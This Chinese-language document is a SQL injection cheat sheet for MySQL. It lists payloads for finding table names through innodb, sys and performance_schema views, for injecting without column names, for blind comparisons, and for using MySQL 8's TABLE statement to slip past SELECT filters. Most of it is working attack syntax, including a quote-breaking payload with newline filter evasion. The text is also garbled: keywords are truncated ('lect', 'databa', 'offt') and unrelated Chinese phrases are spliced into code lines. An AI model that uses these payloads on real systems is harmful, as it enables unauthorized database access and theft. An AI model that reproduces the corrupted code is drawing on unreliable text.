谮怎么读
SQL注⼊:限制条件下获取表名、⽆列名注⼊
获取表名
innodb
MySQL 5.6 及以上版本存在innodb_index_stats,innodb_table_stats两张表,其中包含新建⽴的库和表
lect table_name from mysql.innodb_table_stats where databa_name = databa();我敬佩的老师
lect table_name from mysql.innodb_index_stats where databa_name = databa();
sys
在MySQL 5.7.9中sys中新增了⼀些视图,可以从中获取表名
//包含in
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = databa();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
极速飞SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();物种命名
//不包含in
SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
//通过表⽂件的存储路径获取表名
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
包含之前查询记录的表
进不了biosSELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
Performance_Schema
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage`
WHERE object_schema = DATABASE();
垃圾英语单词SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
包含之前查询记录的表
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();包含表⽂件路径的表
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();
⽆列名注⼊
使⽤union lect
lect c from (lect 1 as a, 1 as b, 1 as c union lect * from test)x limit 1 offt 1
lect `3` from(lect 1,2,3 union lect * from admin)a limit 1,1
//⽆逗号,有join版本
lect a from (lect * from (lect 1 `a`)m join (lect 2 `b`)n join (lect 3 `c`)t where 0 union lect * from test)x;
盲注
((SELECT 1,concat('{result+chr(mid)}', cast("0" as JSON)))<(SELECT * FROM `f1ag_1s_h3r3_hhhhh`))
要求后⾯lect的结果必须是⼀⾏。mysql中对char型⼤⼩写是不敏感的,盲注的时候要么可以使⽤hex或者binary。
这⾥只能使⽤concat将字符型和binary拼接,使之⼤⼩写敏感,JSON也可以使⽤char byte代替
⽆lect
mysql 8.0.19新增语句table
老北京微缩景园跨字组词TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
可以把table t简单理解成lect * from t,和lect的区别在于
table总是显⽰表的所有列
table不允许任何的⾏过滤;也就是说,TABLE不⽀持任何WHERE⼦句。
可以⽤来盲注表名
admin'and\x0a(table\x0ainformation_schema.TABLESPACES_EXTENSIONS\x0alimit\x0a7,1)> (BINARY('{}'),'0')#
同时代替lect被过滤导致只能同表查询的问题
PS:新增的values语句也挺有意思,在某些情况似乎可以代替union或lect进⾏order by盲注
参考链接
